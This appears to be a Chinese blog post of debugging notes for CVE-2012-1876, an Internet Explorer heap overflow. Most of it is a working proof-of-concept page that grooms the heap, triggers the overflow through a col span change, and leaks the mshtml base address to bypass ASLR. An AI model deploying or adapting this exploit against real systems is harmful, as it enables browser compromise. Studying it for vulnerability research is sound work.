CVE-2012-1876调试要点

最新推荐文章于 2024-07-20 17:12:48 发布

weixin_33830216

最新推荐文章于 2024-07-20 17:12:48 发布

阅读量218

点赞数

文章标签： python

原文链接：https://my.oschina.net/u/3281747/blog/1922878

版权

2019独角兽企业重金招聘Python工程师标准>>>

调试要点：

.childdbg 1命令无效时，直接在拖入poc.html之后进行Attach，中间会有IE的Active控件加载暂停IE
进行真实的exp调试时，需关闭hpa，使得程序的堆管理在正常情况下进行

此poc的思想是先通过Js分配堆内存，然后再释放一部分造成已分配堆块直接产生空闲的间隙堆块，之后再解析<table>的时候，会分配0x1C*max(span,4)大小的堆块，poc中设置span=9，是因为0x1C*9=0xFC<0x100，刚好使得之前释放的空隙堆块再次分配出来，最后Js设置<table>span为19，来造成溢出。所以总结起来堆块的操作顺序就是：先Js代码不断分配释放构成空闲间隙堆块布局->解析<table>中span属性将空闲间隙堆块分配出来->Js代码设置<table>span属性来造成造成堆复制溢出。根据Html从上到下的解析顺序得到POC代码如下

<html>
<body>
<div id="evil"></div>
<script language='javascript'>

        var leak_index = -1;
 
        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;
 
        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;
 
        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;
 
        
        var arr = new Array();
        var rra = new Array();
 
        var div_container = document.getElementById("evil");
        div_container.style.cssText = "display:none";
        //1.布局堆块内存
        for (var i=0; i < 500; i+=2) {
 
            // E
            rra[i] = dap.substring(0, (0x100-6)/2);
 
            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);
 
            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);
 
            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);
 
        }
 
        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }


</script>
//2.占位空闲间隙堆块
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp</col></table>

<script language='javascript'>	
    //3.修改span属性造成堆中的复制溢出
	var evil_col = document.getElementById("132");	
	evil_col.span = "19";
	alert("after over flow");
	
	var leak_addr=-1;
	for(var i = 0;i<500;i++){
        //#检测到被溢出的堆块，向后越界访问到下一个堆块（属于button），读取到button的虚函数表，因为虚表地址
        //在.rdata，虚表地址的位置相对dll基地址的偏移固定，所以CBuutonLayout虚表指针-偏移=mshtml基址
		if(arr[i].length>(0x100-6)/2){
			leak_index=i;
			var leak=arr[i].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2);
			leak_addr = parseInt(leak.charCodeAt(1).toString(16)+leak.charCodeAt(0).toString(16),16);
			alert(leak_addr.toString(16));
			leak_addr=leak_addr-Number(0x001584f8);
			alert(leak_addr.toString(16));
			break;
		}
	}    
</script>


</body>
</html>

转载于:https://my.oschina.net/u/3281747/blog/1922878